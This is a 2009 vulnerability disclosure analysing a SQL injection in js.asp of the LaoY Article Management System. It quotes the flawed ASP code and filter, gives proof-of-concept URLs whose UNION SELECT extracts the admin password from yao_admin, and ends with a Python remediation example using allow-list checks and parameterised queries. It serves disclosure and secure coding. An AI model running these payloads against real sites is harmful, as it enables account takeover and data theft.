
LaoY Article Management System (老Y文章管理系统) injection 0day

2009-6-16 09:30 | Submitted by: security

Severity: medium

Description: the vulnerability is in js.asp. Let us look at the source first.

Code (js.asp):

  If CheckStr(Request("ClassNo")) <> "" then
      ClassNo = split(CheckStr(Request("ClassNo")),"|")
      ' The parameter is read through the CheckStr filter, but the filter does not seem to take effect; the value is then split into an array
      on error resume next
      NClassID = LaoYRequest(ClassNo(0))
      NClassID1 = LaoYRequest(ClassNo(1))
      ' Elements 0 and 1 of the array go through integer filtering; no vulnerability here
  End if
  num = LaoYRequest(request.querystring("num")) ' num must be >= 1 here
  .......
  set rs=server.createObject("Adodb.recordset")
  sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"
  If NclassID<>"" and NclassID1="" then
      If Yao_MyID(NclassID)="0" then
          SQL=SQL&" and ClassID="&NclassID&""
      else
          MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
          SQL=SQL&" and ClassID in ("&MyID&")"
      End if
  elseif NclassID<>"" and NclassID1<>"" then
      MyID = Replace(""&Request("ClassNo")&"","|",",")
      SQL=SQL&" and ClassID in ("&MyID&")"
      ' Here is the problem: the raw ClassNo parameter is written into the query with no further filtering
  End if
  select case topType
      case "new" sql=sql&" order by DateAndTime desc,ID desc"
      case "hot" sql=sql&" order by hits desc,ID desc"
      case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"
  end select
  set rs = conn.execute(sql)
  if rs.bof and rs.eof then
      str=str+"没有符合条件的文章"
  ........

-------------------------------

Code (function.asp; the "&lt;" and "&gt;" replacement targets were HTML-decoded by the page extraction and are restored here):

  function CheckStr(str)
      CheckStr=replace(replace(replace(replace(str,"<","&lt;"),">","&gt;"),chr(13),"")," ","")
      CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
      CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
      CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
  end function

Note that the filtered value is only used to populate the ClassNo array whose first two elements are integer-checked; the second branch of the query builder reads Request("ClassNo") again, unfiltered, which is why CheckStr has no effect on the injected SQL.

Proof of concept:

  js.asp?num=1&ClassNo=1|1|1[SQL]
  js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1
  #### retrieves the password

Note: this vulnerability was tested against version 2.4.
Download page on chinaz: http://down.chinaz.com/soft/23126.htm
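An added example, not code from the original post or from the LaoY product: a Python model of the second query-builder branch above, placing the vulnerable concatenation beside an allow-list check on every "|"-separated field and a parameterised query. The sqlite3 in-memory table, its columns and the sample rows are constructed assumptions.

```python
import re
import sqlite3

def vulnerable_sql(class_no: str, num: int = 1) -> str:
    """Mirror of js.asp's second branch: every '|' becomes ',' and the
    untouched request parameter lands inside the IN (...) clause."""
    my_id = class_no.replace("|", ",")
    return ("Select top %d ID,Title from Yao_Article Where yn = 0"
            " and ClassID in (%s)" % (num, my_id))

def parse_class_no(class_no: str) -> list[int]:
    """Allow-list check: each '|'-separated field must be a short decimal
    integer. The original only integer-checks the first two fields; checking
    all of them removes the injection point instead of blacklisting keywords."""
    fields = class_no.split("|")
    if any(not re.fullmatch(r"[0-9]{1,9}", f) for f in fields):
        raise ValueError("ClassNo must be '|'-separated integers")
    return [int(f) for f in fields]

def safe_query(conn: sqlite3.Connection, class_no: str, num: int = 1) -> list:
    """Parameterised equivalent of the query: one placeholder per validated
    class ID, and the row limit bound as a parameter rather than spliced in."""
    ids = parse_class_no(class_no)
    placeholders = ",".join("?" * len(ids))
    sql = ("SELECT ID, Title FROM Yao_Article WHERE yn = 0"
           f" AND ClassID IN ({placeholders}) ORDER BY ID DESC LIMIT ?")
    return conn.execute(sql, (*ids, num)).fetchall()

def demo_db() -> sqlite3.Connection:
    """Constructed sample table (hypothetical schema, not the product's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Yao_Article "
                 "(ID INTEGER, Title TEXT, ClassID INTEGER, yn INTEGER)")
    conn.executemany("INSERT INTO Yao_Article VALUES (?,?,?,?)",
                     [(1, "a", 1, 0), (2, "b", 2, 0), (3, "c", 1, 1)])
    return conn

if __name__ == "__main__":
    print(vulnerable_sql("1|2"))
    print(safe_query(demo_db(), "1|2", 5))
```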
